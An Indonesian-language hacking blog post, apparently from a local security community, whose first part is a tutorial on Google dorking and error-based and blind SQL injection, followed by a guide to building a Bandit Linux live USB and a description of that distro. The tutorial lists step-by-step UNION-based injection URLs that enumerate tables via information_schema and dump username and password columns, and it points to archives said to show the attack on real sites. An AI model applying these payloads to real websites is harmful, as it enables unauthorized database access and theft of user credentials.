Halu.. halu .. semuanya … masi ketemu lagi di …. ..

Hacking three in one ?? weleh2 … kek game watch aja … hihiihih…

ok2… maksudna nih kita mo research or apa kek dengan 3 metode:

1. Google hacking
2. SQL Injection (based error)
3. Blind SQL Injection.

1. Google Hacking

Untuk Google hacking sendiri sudah banyak sekali cara atau syntax yang dipakai. Di internet sudah banyak juga yang membahas gimna sie kita mo pake googel untuk aktivitas hacking. Misalnya:

inurl:admin
site:go.id
domain:com

kalo ada yang mo nambahin silahkan …

Video Tutorial bisa diunduh di sini
gogel-hacking.rar

2. SQL INJECTION

Teori:

1. Cek Vulnerability.

a. Letakkan karakter Single Quote pada akhri url address bar.
ie : http://www.target.com/index.php?pageID=1′ <== karakter diletakkan di belakang url address bar.

b. Gunakan Operator Logika.
Anda bisa gunakan operator and,or,dll.
Ex 1 : and 1=1
ie : http://www.target.com/index.php?pageID=1 and 1=1 <== Return True,
artinya jika kita meletakkan operator logika tersebut maka tidak terjadi error alias page berjalan dengan normal.

Ex 2 : and 1=2
ie : http://www.target.com/index.php?pageID=1 and 1=2 <== Return False,
artinya jika kita meletakkan operator logika tersebut maka terjadi error alias page tidak berjalan dengan normal.

2. Cek Kolom.

ie :
- http://www.target.com/index.php?pageID=1+order+by+1/* <== Return True.
- http://www.target.com/index.php?pageID=1+order+by+2/* <== Return True.
- http://www.target.com/index.php?pageID=1+order+by+3/* <== Return True.
- http://www.target.com/index.php?pageID=1+order+by+4/* <== Return False.

Note : Kita asumsikan bahwa ketika kita memasukkan nilai 4, maka muncul pesan error “Unknown Colomn ‘4′”,
maka kita dapat menarik suatu kesimpulan bahwa kolom yang ada hanya 1,2, dan 3.

3. Cek Hole Pada Kolom.
Untuk mengecek di kolom berapa terdapat hole atau kolom yang bermasalah kita bisa gunakan stament
“UNION ALL SELECT ” atau “UNION SELECT ” ,dll.

ie :
- http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,2,3/*

4. Cek Versi MYSQL.
Mengapa perlu mengecek versi dari MySQL? karena teknik sql injection untuk v 4.xx atau < v 5.xx tidak sama.
Pada contoh ini saya menggunakan v 5.xx. anda bisa pake @@version atau version() , terserrah mau pake yang mana .. yng penting maknyuss..

ie : http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,@@version,3/*

Note : Kita Asumsikan versi dari mysql adalah 5.x.x

5. Cek Tabel dan Kolom.
a. Cek Tabel.
Untuk mengecek tabel gunakan statement berikut :
” information_schema.tables + table_name ”

ie : http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,table_name,3+from+information_schema.tables/*

b. Cek Kolom
Cara pengecekan kolom hampir sama dengan pengecekan tabel, hanya saja pada pengecekan kolom kita gunakan statement berikut :
” information_schema.columns … column_name … ”

ie : http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,column_name,3+from+information_schema.columns/*

Untuk mengekstrak kolom pada tabel tertentu kita bisa gunakan statement berikut :

ie:
http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,column_name,3+from+information_schema.columns+where+table_name=’user’/*

6. Get Value of Colomn.
Setelah kita ketahui nama-nama kolom yang ada pada table, maka langkah selanjutnya adalah mengekstrak nilai-nilai tersebut.
Untuk mengekstrak nilai tersebut kita bisa melakukannya secara satu persatu dan atau secara keseluruhan atau bersamaan.

Note : Asumsikan bahwa kita mengetahui bahwa table user memiliki kolom ‘username’ dan ‘password’.

a. Secara satu per satu.
ie : http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,username,3+from+user/*
ie : http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,password,3+from+user/*

atau secara bersamaaan

http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,group_concat(username,0×3a,password),3+from+user/*

itu mah cuman teoriiiiiiii !!!!! mana realitanya ????????

tenang BOSSS …. (njiplak dikit dr w3hol)

tenang boss… silahkan realita na di sini

bandit-goto-campus.rar

3. Blind SQL Injection

secara inti jalan / cara methode nya sama dengan SQL Injection. Tetapi ada yang beda… nah lo .. apa lagi nih……

Serupa tapi tak sama. Yup.. kira2 begitulah..

Jika didalam SQL injection menampilkan error karena “unknown column” atau error yang lain, tapi didalam teknik Blind SQL Injection halaman yang ditampilkan bisa berupa halaman yang kosong / blank / blind , atau bisa juga berubah menjadi artikel lain (REAL BLIND) , atau bisa juga tidak ada artikel yang ditampilkan, seperti gambar berikut

blind.png

untuk memastikan kembali apakah benar2 ada vulneralbility, kita bisa mengecek jumlah kolom dengan order by, karena bisa saja itu REAL BLIND, dan pasti akan terasa sangat susah . Jika hnya blind saja, cara selanjutnya yg digunakan sama dengan teknik SQL Injection.

utk pratekna bisa dlihat di sini. tapsel.rar

saya kira cukup segini aj …kalo aada kurang lebihnya saya mohon maap ^^

just learn… diatas langit masi ada langit …..

cmiiw

**sori gak sempet nyensor… me bukan anggota KPI sie … ;p

thx to:

- Stuff, Crew and members of virologi.info
- Stuff, Crew and members of echo.or.id
- witecloner dkk .. love u guyss… muachhh

reference:

1. echo.or.id (byk sekali tutorna disini)
2. Marezzi paper

hello semua ..
wah rupanya ini posting ke dua saya di bandit, langsung aja yach…
salah satu kelebihan bandit linux adalah ke-portable-an nya .. karena bandit linux sangat mudah dibuat agar dapat langsung di-boot dari usb flah disk … dengan syarat komputer anda harus mendukung untuk booting dari usb flash disk, biasanya laptop atau komputer jaman skrang bios nya sudah mendukung untuk booting dari flash disk.

pada tips kali ini, saya akan menerangkan bagaimana membuat Bandit Linux OS Live USB kita.. kita akan menginstallnya ke usb flash disk dari sistem operasi windowS … !!! loh2 kok kenapa dari windoWs .. ??? tenang boSs … untuk awal saya kasih tau cara yang termudah dahulu yaitu dari windows… .

Nah bisa gak Membuat Live USB bandit Dari Linux ??? untuk Membuat Live USB Bandit dari sistem operasi linux sangat bisa sekali… !! nanti akan saya posting di kesempatan berikutnya .. sabaR ya .. Hikzz

Persiapan :

1. ISO Bandit Linux Yang Dapat di Download Dari : http://repo.ugm.ac.id/iso/bandit/
2. Winrar untuk mengekstrak file ISO tersebut

Setelah Anda Download ISO-nya anda ekstrak dengan program winrar seperti yang anda lihat pada screen shoot dibwah ini :

setelah anda pilih extratc here, anda akan menemukan 2 folder hasil ekstrakan yaitu folder : boot dan bandit seperti terlihat di screen shoot dibawah ini :

kemudian copykan folder tersebut ke usb flash anda :D, …..
setelah proses copy sudah selesai masuk ke direktori boot di usb flash anda dan cari file yang bernama : bootinst.bat seperti screen shoot dibawah ini :

setelah ketemu file tersebut anda klik dan anda akan mendapat menu kurang lebih seperti ini :

tekan apa saja untuk melanjutkan, skrip tersebut akan menginstall bootloader ke MBR Flash Disk anda yang nantinya akan digunakan untuk proses booting. kemudian akan muncul konfirmasi seperti berikut dan tekan apa saja untuk menyimpan konfigurasi dan selesai :

semua proses sudah selesai … skrang TEST .. Test …

NB : jangan lupa untuk mengganti Konfigurasi BIOS anda agar booting dari USB Flash

selamat Mencoba

thanks : w3hol

Bandit Linux adalah sebuah Sistem operasi hasil Remaster anak bangsa indonesia hikzz dari turunan distro linux aslinya yaitu Slackware dan Backtrack, wah apa sih Remaster itu sendiri ?? Remaster adalah sebuah proses merangkai sebuah sistem yang kemudian menjadi sistem operasi yang bisa digunakan sesuai kebutuhan kita.

Tampilan Bandit Linux ini look and feelnya sengaja dibuat semirip windows, agar user yang terbiasa menggunakan windows tidak kaget yang kata orang Linux itu SeyeMM ..!! hikzz.. Bandit Linux menjadikan anda lebih portable karena Sistem operasi bandit ini bisa anda pasang di Flash Disk anda..

berikut screen shoot bandit Linux :

Desktop bandit linux

multimedia, wireless, command line

Installer & Explorer

Nama OS : BANDIT
Singkatan : Barricade Administration Network and Defensive Internet Tools
Distro : Slackware, Backtrack
Kernel : 2.6.24.5
Paket : Internet,Security Tools, Multimedia
Developer :
- w3hol
- deanet
- edge_mank (thanks buat dia untuk design logo bandit)
- dan anda selanjutnya ….

Supported By : aat_shadewa
—————-

Baca Juga : Peluncuran OS Baru Virologi (BANDIT)